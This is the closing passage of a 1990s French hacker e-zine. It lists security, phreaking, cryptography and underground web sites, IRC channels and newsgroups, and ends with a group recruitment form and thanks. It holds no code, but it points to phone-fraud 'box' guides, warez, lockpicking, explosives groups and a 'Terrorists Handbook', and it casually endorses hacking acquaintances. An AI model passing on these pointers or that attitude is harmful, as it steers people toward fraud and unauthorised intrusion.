ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
info.bellcore.com/BETSI/betsi.html (Betsi)
info.gte.com (GTE Labrotories)
info.mcc.ac.uk/Orange (Orange)
infosec.nosc.mil/infosec.html (SPAWAR INFOSEC)
infosec.nosc.mil/navcirt.html (NAVCIRT)
iss.net/iss (Internet Security Systems)
jumper.mcc.ac.uk/~afs/telecom (UK Telecom Pricing Information)
l0pht.com (The l0pht)
l0pht.com/~oblivion/IIRG.html (Phantasy Magazine)
l0pht.com/~spacerog/index.html (Whacked Mac Archives)
lcs.mit.edu/telecom-archives/areacodes/guide
(North American Area Codes)
lcs.mit.edu/telecom-archives/npa.800 (1-800 Info)
lcs.mit.edu/telecom-archives/npa.900 (1-900 Info)
lod.com (Legion of Doom)
lod.com/~gatsby (Gatsby)
lod.com/~tabas (Mark Tabas -- LOD)
lod.com/~vampire/emptime7 (Empire Times)
magicnet.net/xtabi/netscape/links/cypher.html (Cryptology)
mars.superlink.net/user/esquire (Red box info)
matrix.resnet.upenn.edu/rourke (FakeMail FAQ)
mindlink.jolt.com (The Secrets of LockPicking)
mindlink.net/A7657 (Stephen H Kawamoto's Home Page)
mls.saic.com (SAIC MLS)
mnementh.cs.adfa.oz.au/Lawrie_Brown.html
(Lawrie Brown's crypto bibliography)
motserv.indirect.com (Motorola)
naic.nasa.gov/fbi (FBI information)
nasirc.nasa.gov/NASIRC_home.html (NASIRC)
obscura.com/~loki/ (Cryptology)
ophie.hughes.american.edu/~ophie (Ophie)
oregano.sl.pitt.edu/index.htm
outpost.callnet.com/outpost.html
pages.ripco.com:8080/~glr/glr.html (Full Disclosure)
peg.pegasus.oz.au (EFF Australia)
quetel.qc.ca/qt0000ag.htm (Quebec-Telephone)
resudox.net/bio/mainpage.html (BioHazard's Home Page)
ripco.com:8080/~glr/glr.html (Full Disclosure)
rschp2.anu.edu.au:8080/crypt.html
scitsc.wlv.ac.uk/~cs6171/hack (UNIX Security)
seclab.cs.ucdavis.edu/Security.html (Security)
seclab.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)
sfpg.gcomm.com/mitnick/mitnick.htm (3wP Kevin Mitnick WWW HomePage)
smurfland.cit.buffalo.edu/NetMan/index.html (Network Management)
sunsite.unc.edu/sun/inform/sun-info.html
(Sun Microsystems Sponsor Page)
support.mayfield.hp.com (Hewlett Packard SupportLine Services)
tamsun.tamu.edu/~clm3840/hacking.html (Hacking/Phreaking)
the-tech.mit.edu (LaMacchia case info)
town.hall.org/university/security/stoll/cliff.html (Cliff Stoll)
turnpike.net/emporium/C/celestial/celest.html
(Detective Databases 1995)
ucs.orst.edu:8001/mintro.html (Micro Power Broadcasting)
underground.org (Eubercrackers)
unixg.ubc.ca:780/~jyee/ (Cell)
w3.gti.net/safety
web.mit.edu/network/pgp.html (Getting PGP)
web.nec.com/products/necam/mrd/cellphones/index.html (NEC)
weber.u.washington.edu/~phantom/cpunk/index.html (Cryptology)
wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links)
wintermute.itd.nrl.navy.mil/5544.html (Network Security)
www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
www-ns.rutgers.edu/www-security/index.html
(Rutger's documents on WWW security)
www-personal.engin.umich.edu/~jgotts/underground/boxes.html
(Box info)
www-swiss.ai.mit.edu/~bal/pks-toplev.html (Findingsomeone's PGP key)
www.2600.com (2600 Magazine)
www.8lgm.org (8lgm Security Advisories)
www.aads.net (Ameritech)
www.access.gpo.gov/su_docs/
www.aloha.com/~seanw/index.html
www.alw.nih.gov/WWW/security.html (Unix Security)
www.artcom.de/CCC/hotlist.html (Chaos Computer Club Hotlist)
www.artech-house.com/artech.html (Artech House)
www.asg.unb.ca (Atlantic Systems Group Mosaic Index)
www.aspentec.com/~frzmtdb/fun/hacker.html
www.aston.ac.uk/~bromejt/mobile.html (Mobile Phone Service Locator)
www.att.com (ATT)
www.auditel.com (Auditel)
www.auscert.org.au (Australian CERT)
www.axent.com/axent (Axent Technologies)
www.ba.com (Bell Atlantic)
www.bctel.com (BC Tel)
www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html
(X-Win)
www.bell.ca (Bell Canada)
www.bell.com (MFJ Task Force)
www.bellcore.com/SECURITY/security.html(Bellcore Security Products)
www.border.com (Border Network Technologies)
www.brad.ac.uk/~nasmith/index.html
www.brad.ac.uk/~nasmith/underground.html (Undergound WWW Sites)
www.bst.bls.com (BellSouth)
www.bt.co.uk (British Telecom)
www.business.co.uk/cellnet (Cellnet)
www.c2.org:80/remail/by-www.html (WWW-based remailing form)
www.c3.lanl.gov/~mcn (Lanl)
www.cam.org/~gagnon (OCP's)
www.careermosaic.com/cm/uswest (USWest)
www.castle.net/~kobrien/telecom.html (Telecom)
www.cco.caltech.edu/~rknop/amiga_pgp26.html
www.cdt.org/cda.html
www.cec.wustl.edu/~dmm2/egs/egs.html (En Garde Systems)
www.cert.dfn.de/ (German First Team)
www.checkpoint.com (Checkpoint)
www.chem.surrey.ac.uk/~ch11mh/secure.html
(Another page on secure WWW server setup)
www.chez.com/norace/ (NoRace : groupe de phreak)
www.chez.com/palm/ Page du hackeur Palm
www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html
(Are You Some Kind Of PHREAK!)
www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
www.cityscape.co.uk/users/ek80/index.html (Inside Cable Cover)
www.cohesive.com (Cohesive Systems)
www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
www.con.wesleyan.edu/~triemer/network/docservs.html
www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
www.cosc.georgetown.edu/~denning/crypto (The Cryptography Project)
www.cost.se (COST Computer Security Technologies)
www.cpsr.org/home (CPSR)
www.crimson.com/isdn/telecomacry.txt
(Crimson's Telecommunications Acronyms)
www.crtc.gc.ca (CRTC - Canadian regulator)
www.cs.berkeley.edu/~raph/remailer-list.html (Anon remailer list)
www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html
(CMU Security)
www.cs.purdue.edu/coast/coast.html (Coast)
www.cs.purdue.edu/pcert/pcert.html (PCERT)
www.cs.tu-bs.de (Network management Tools)
www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
www.cs.umd.edu/~lgas (Laughing Gas)
www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html
(Haquerwerld)
www.csd.harris.com/secure_info.html (Harris)
www.csl.sri.com (SRI Computer Science Lab)
www.csua.berekeley.edu/pub/cypherpunks/Home.html (Cryptology)
www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html
www.cyber.co.uk/~joyrex (Joyrex Cellular)
www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
www.cygnus.com/~gnu/export.html
(Cryptography Export Control Archives)
www.datafellows.fi (Data Fellows (F-Prot)
www.datasync.com/~sotmesc/sotmesc.html (SotMESC)
www.dcs.exeter.ac.uk/~aba (Cypherpunk)
www.dct.ac.uk/~misb3cp/2600/faq.txt
www.demon.co.uk/mobiles (C.C.Mobiles)
www.dhp.com (DataHaven Project)
www.dhp.com/~pluvius (Pluvius' Home Page)
www.digicash.com/ecash/ecash-home.html (Ecash Home Page)
www.digital.com/info/key-secure-index.html (Digital Secure Systems)
www.dnai.com/~gui/index.html
www.dtic.dla.mil/defenselink
(Office of the U.S. Secretary of Defense (OSD)
www.dtic.dla.mil/iac
(DoD Information Analysis Center (IAC) Hub Page)
www.eecs.nwu.edu/~jmyers/bugtraq/about.html
www.eecs.nwu.edu/~jmyers/bugtraq/archives.html
www.eecs.nwu.edu/~jmyers/bugtraq/index.html (Bugtraq)
www.eecs.nwu.edu/~jmyers/ids/index.html(Intrusion Detection Systems)
www.eff.org
www.eff.org/pub/Alerts
www.eff.org/pub/Net_info/Tools/Crypto/
www.emap.co.uk/partners/racal-airtech (Racal-Airtech)
www.ensta.fr/internet/unix/sys_admin (System administration)
www.epic.org
www.ericsson.nl (Ericsson)
www.etext.org/Zines/ (Zines)
www.farmstead.com (Farmstead)
www.fbi.gov/fbi/FBI_homepage.html (FBI Homepage)
www.fc.net/defcon (DefCon)
www.fedworld.gov (Federal Government)
www.first.org/first/ (FIRST)
www.fonorola.net (Fonorola (a Canadian carrier)
www.frhack.org Groupe de frhack
www.frus.com (Firewalls R Us)
www.gbnet.net/kbridge (KarlBridge)
www.getnet.com/crak (CRAK Software)
www.getnet.com/~vision
www.gold.net/users/cw78 (FleXtel)
www.greatcircle.com (Great Circle Associates)
www.gsu.edu/~socrerx/catalog.html
www.gta.com/index.html (Global Technology Associates)
www.gti.net/grayarea (Gray Areas)
www.hotwired.com (Wired Magazine)
www.hpcc.gov/blue94/section.4.6.html (NSA)
www.hq2.telecom.ie (Telecom Eireann)
www.iacr.org/~iacr
(International Association of Cryptologic Research (IACR)
www.ibmpcug.co.uk/~Vidtron (Videotron)
www.ic.gov (Central Intelligence Agency Home Page)
www.ifi.uio.no/~staalesc/PGP/home.html
www.iia.org/~gautier/me.html (Rich Gautier's Home Page)
www.indirect.com/www/evildawg
www.indirect.com/www/johnk/ (CRAK Software)
www.ingress.com (Ingress Communications)
www.interaccess.com/trc/tsa.html
www.io.org/~djcl/phoneb.html
www.iquest.net/~oseidler (Oliver Seidler's WWW Page)
www.itd.nrl.navy.mil/ITD/5540
(NRL Center for High Assurance Computer Systems)
www.itu.ch/TELECOM (Telecom '95)
www.jagunet.com/~john/
www.jedefense.com/jed.html (Journal of Electronic Defense)
www.l0pht.com/cdc.html (Cult of the Dead Cow)
www.l0pht.com/radiophone (Radiophone Archive)
www.l0pht.com/~oblivion/IIRG.html
(International Information Retrieval Guild Archive Site)
www.lat.com (Los Altos Technologies)
www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
www.lib.iup.edu/~seaman/hack/bone.html (Bone's H/P/C page o' rama)
www.links.net
www.linux-france.com Linux France
www.linux.sos-informatique.com Un autre site Linux en francais
www.linux-kheops.com/ Kheops
www.louisville.edu/~wrbake01 (The GodZ of CyberSpacE)
www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
www.magi.com/~vektor/linenoiz.html
www.mastercard.com (Secure Electronic Payment Protocol)
www.mcs.com/~candyman/http/radio.html (Radar)
www.mcs.com/~candyman/under.html (Cell)
www.mcs.net/~candyman (H/P)
www.mgmua.com/hackers/index.html (Hackers, the movie)
www.micronet.fr/~darcelf/ Le hacking en france
www.milkyway.com (Milkyway Networks Corporation)
www.mit.edu:8001/people/warlord/pgp-faq.html
(PGP 2.6.2 FAQ, Buglist, Fixes, and Improvements)
www.monmouth.com/~jshahom (The Insomniac's Home Page)
www.mot.com (Motorola)
www.mpr.ca/ (MPR Teltech Ltd)
www.msen.com/~emv/tubed/spoofing.html (Info on IP spoofing attacks)
www.mwjournal.com/mwj.html (Microwave Journal)
www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html
(Security in Mosaic)
www.ncsl.nist.gov (NIST Computer Systems Laboratory)
www.net23.com (Max Headroom)
www.netpart.com (NetPartners)
www.netresponse.com:80/zldf/
www.nic.surfnet.nl/surfnet/security/cert-nl.html (CERT-NL)
www.nist.gov (NIST)
www.nokia.com (Nokia)
www.nortel.com (Northern Telecom)
www.ntt.jp (Nippon Telephone)
www.nynex.co.uk/nynex (NYNEX)
www.odci.gov (The CIA)
www.one2one.co.uk (Mercury One-2-One)
www.open.gov.uk/oftel/oftelwww/oftelhm.htm (OFTEL's Home Page)
www.openmarket.com/info/cryptography/applied_cryptography.html
www.pacbell.com (Pacific Bell)
www.panix.com/vtw
www.paranoia.com/astrostar/fringe.html
www.paranoia.com/hpa (Paranoia's H/P/A Links)
www.paranoia.com/mthreat (ToneLoc)
www.paranoia.com/~coldfire (Cold Fire's Web Page)
www.paranoia.com/~darkfox (Darkfox's Home Page)
www.paranoia.com/~ice9 (Ice-9's Home Page)
www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
www.phantom.com/~darkcyde (DarkCyde)
www.phantom.com/~king (Randy King's WWW Page)
www.phillips.com (Phillips Electronics)
www.phred.org (The Phred Networking Organization)
www.pic.net/uniloc/starlink (Starlink)
www.planet.net/onkeld (BlueBeep Home Page)
www.primenet.com/~kludge/haqr.html (Kludge)
www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography)
www.qualcomm.com/cdma/wireless.html (Qualcomm CDMA)
www.ramp.com/~lcs/winpgp.html (PGP with MS/Win)
www.raptor.com (Raptor)
www.raptor.com/raptor/raptor.html (Raptor Network Isolator)
www.research.att.com (AT&T)
www.respublica.fr/underground-angels/index.htm
(The Underground Angels)
www.rocksoft.com/~ross (Rocksoft Pty (Veracity)
www.rogers.com (Rogers Communications)
www.rsa.com (RSA Data Security)
www.sasknet.sk.ca/Pages/sktlhome.html (SaskTel)
www.satelnet.org/~ccappuc
www.sccsi.com/lsli/lsli.homepage.html (PORTUS)
www.sctc.com (Secure Computing Corporation)
www.seas.upenn.edu/~rourkem (FakeMail FAQ)
www.seduction.com
www.sei.cmu.edu/SEI/programs/cert.html (CERT Coordination Center)
www.service.com/cm/uswest/usw1.html (USWest)
www.shore.net/~eskwired/hp.html
www.soci.niu.edu/~cudigest
www.somar.com (Somar Software)
www.soscorp.com (Sources of Supply Corp)
www.spatz.com/pecos/index.html (The World of Hacking)
www.spy.org (Computer Systems Consulting)
www.spy.org (spy.org)
www.sri.com (SRI)
www.stentor.ca (Stentor (Canadian telcos)
www.tecc.co.uk/public/uk-telecom/btns.html (BT "star services")
www.telecoms-mag.com/tcs.html (Telecommunications Magazine)
www.telkom.co.za (Telkom S.A. Ltd)
www.telstra.com.au/info/security.html (Security Reference Index)
www.teresa.com
www.tezcat.com/web/security/security_top_level.html
www.tiac.net/users/triad/philes/jokai.html
(Jokai Reservation for the Preservation of the 1st Amendment)
www.ticllc.net/~scrtnizr
www.tis.com (Trusted Information Systems)
www.trcone.com/t_crookb.html (CrookBook)
www.tregistry.com/ttr (Telecomunications Training Courses)
www.tri.sbc.com (Southwestern Bell)
www.tricon.net/Comm/synapse (Synapse Magazine)
www.tufts.edu/~jpagano/
www.uccs.edu/~abusby/hpawebsites.html
www.uccs.edu/~abusby/k0p.html (kn0wledge phreak)
www.uci.agh.edu.pl/pub/security (Security)
www.uknet.net/pnc (The Personal Number Company)
www.umcc.umich.edu/~doug/virus-faq.html (Virus)
www.underground.org (underground.org)
www.underground.org/bugs/
www.usfca.edu/crackdown/crack.html (Hacker Crackdown)
www.vodafone.co.uk (Vodafone)
www.vptt.ch/natel.html (Natel)
www.wam.umd.edu/~ankh/public/devil_does_unix
www.warwick.ac.uk/WWW/search/Phones/nng.html
(National Number Group Codes)
www.well.com/user/abacard
www.well.com/user/crunch (Captain Crunch)
www.wfu.edu/~wilsonbd
www.wiltel.com (Wiltel)
www.wiltel.com/glossary/glossary.html (Telecommunications Glossary)
www.wired.com (HotWired)
www2.undernet.org:8080/~cs93jtl/IRC.html (IRC)



---------------------------------------------------------------------

IRC
#2600
#hack
#hacker
#hacking
#phreak
#phreaker
#phreaking
#warez
#linux
#cellular
#Unix
#hack.fr
#hacking.fr
#hacker.fr
#francehack

---------------------------------------------------------------------

newsgroups


alt.2600 Do it 'til it hertz
alt.2600hz
alt.2600.codez
alt.2600.debate
alt.2600.moderated
alt.cellular
alt.cellular-phone-tech
Brilliant telephony mind blow netnews naming
alt.comp.virus An unmoderated forum for discussing viruses
alt.comp.virus.source.code
alt.cracks Heavy toolbelt wearers of the world, unite
alt.cyberpunk High-tech low-life.
alt.cyberspace Cyberspace and how it should work.
alt.dcom.telecom Discussion of telecommunications technology
alt.engr.explosives [no description available]
alt.fan.kevin-mitnick
alt.fan.lewiz Lewis De Payne fan club
alt.hackers Descriptions of projects currently under development
alt.hackintosh
alt.locksmithing You locked your keys in *where*?
alt.hackers.malicious
The really bad guys - don't take candy from them
alt.ph.uk United Kingdom version of alt.2600
alt.privacy.anon-server Tech. & policy matters of anonymous contact servers
alt.radio.pirate Hide the gear, here comes the magic station-wagons.
alt.radio.scanner Discussion of scanning radio receivers.
alt.satellite.tv.europe All about European satellite tv
alt.security Security issues on computer systems
alt.security.index Pointers to good stuff in misc.security (Moderated)
alt.security.keydist Exchange of keys for public key encryption systems
alt.security.pgp The Pretty Good Privacy package
alt.security.ripem A secure email system illegal to export from the US
comp.dcom.cellular [no description available]
comp.dcom.telecom Telecommunications digest (Moderated)
comp.dcom.telecom.tech [no description available]
comp.org.cpsr.announce Computer Professionals for Social Responsibility
comp.org.cpsr.talk Issues of computing and social responsibility
comp.org.eff.news News from the Electronic Frontiers Foundation
comp.org.eff.talk Discussion of EFF goals, strategies, etc.
comp.os.netware.security Netware Security issues
comp.protocols.kerberos The Kerberos authentification server
comp.protocols.tcp-ip TCP and IP network protocols
comp.risks Risks to the public from computers & users
comp.security.announce Announcements from the CERT about security
comp.security.firewalls Anything pertaining to network firewall security
comp.security.misc Security issues of computers and networks
comp.security.unix Discussion of Unix security
comp.virus Computer viruses & security (Moderated)
de.org.ccc Mitteilungen des CCC e.V.
misc.security Security in general, not just computers (Moderated)
rec.pyrotechnics Fireworks, rocketry, safety, & other topics
rec.radio.scanner [no description available]
rec.video.cable-tv Technical and regulatory issues of cable television
sci.crypt Different methods of data en/decryption


---------------------------------------------------------------------
telnet

anarchy-online.com
ntiabbs.ntia.doc.gov (NTIA)
l0pht.com (The L0pht)
sfpg.gcomm.com (The Floating Pancreas)
telnet lust.isca.uiowa.edu 2600 (underground bbs) (temporarily down)
pcspm2.dar.csiro.au (Virtual Doughnutland BBS)
prince.carleton.ca 31337 (Twilight of The Idols)
spy.org (Computer Systems Consulting)

---------------------------------------------------------------------
gopher

ba.com (Bell Atlantic)
cell-relay.indiana.edu (Cell Relay Retreat)
csrc.ncsl.nist.gov (NIST Security Gopher)
gopher.acm.org (SIGSAC (Security, Audit & Control))
gopher.cpsr.org (Computer Professionals for Social Responsibility)
gopher.eff.org (Electonic Frontier Foundation)
gopher.panix.com (Panix)
gw.PacBell.com (Pacific Bell)
iitf.doc.gov (NITA -- IITF)
info.itu.ch (International Telegraph Union)
ncjrs.aspensys.com (National Criminal Justice Reference Service)
oss.net (Open Source Solutions)
spy.org (Computer Systems Consulting)
wiretap.spies.com (Wiretap)

---------------------------------------------------------------------
J'attends vos adresses pour les rajouter à cette liste et si il y un site qui
n'est pas correct, signalez le moi.

=====================================================================

Voilà, ce numéro 1 se termine. J'espère que ça vous a plu.
Je vous attends, vous hackers pour rejoindre notre groupe et pour remettre de
l'ordre ds tout ce bordel.
Venez vous inscrire sur http://www.respublica.fr/underground-angels/
ou remplissez ce questionnaire et envoyez le moi à

White_Angel_TUA@HOTMAIL.COM

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nom:

Prénom:

Age:

Sexe:

E-Mail:

Adresse site web:

Langue(s) parlée(s):

Pays:

Surnom que vous voulez prendre au sein du groupe:

Ce que vous voulez faire dans le groupe:
-
-
-
-
-
-
Vos suggestions:
-
-
-
-
-
-
-
-
-

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Je vous attends nombreux...N'hésitez pas, nous acceptons tout le monde (Jeune,
vieux, homme , femme , débutant , professionnel...)
SAUF LES TETES BRULEE!!!!

=====================================================================
Remerciements
=====================================================================
Je remercie toutes les personnes suivantes:

-The Saint qui n'a pas hésité à me suivre dans cette aventure.
-Mes pôtes de 1ère S
-Mon père et ma mère
-Mon chat
-Mes profs qui me donnent tellement de boulot que je ne m'ennuie plus....
-Mr P. Qui ferme les yeux quand on hacke.
-Tout les abrutis que je connais et sur lesquels je m'entraîne (voir plus bas).
-PC Team, Dream, Pirate mag et le Virus Informatique.
-Tout ceux qui me lisent (vous)
-Merci à tout ceux de la scène underground francophone (Noway, Noroute, FrHack,
et j'en oublie.....)

Je ne remercie pas les personnes suivantes:

-France Télécon
-Microsoft (Bill Getz)
-Compaq
-Mr B. qui ne connait rien à la vie
-Tout ceux qui font leur pros et qui n'y connaissent rien (voir plus haut).
-Et j'en oublis un bon paquet
=====================================================================
A LA PROCHAINE !!! (J'éspère...)
=====================================================================

___________ ____
______/ \__// \__/____\
_/ \_/ : //____\\
/| : : .. / \
| | :: :: \ /
| | :| || \ \______/
| | || || |\ / |
\| || || | / | \
| || || | / /_\ \
| ___ || ___ || | / / \
\_-_/ \_-_/ | ____ |/__/ \
_\_--_/ \ /
/____ /
/ \ /
\______\_________/

  
BOUGE TOI !!!!!!

That's all


HTTP://WWW.RESPUBLICA.FR/UNDERGROUND-ANGELS/INDEX.HTML

White Angel: White_Angel_TUA@Hotmail.com

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT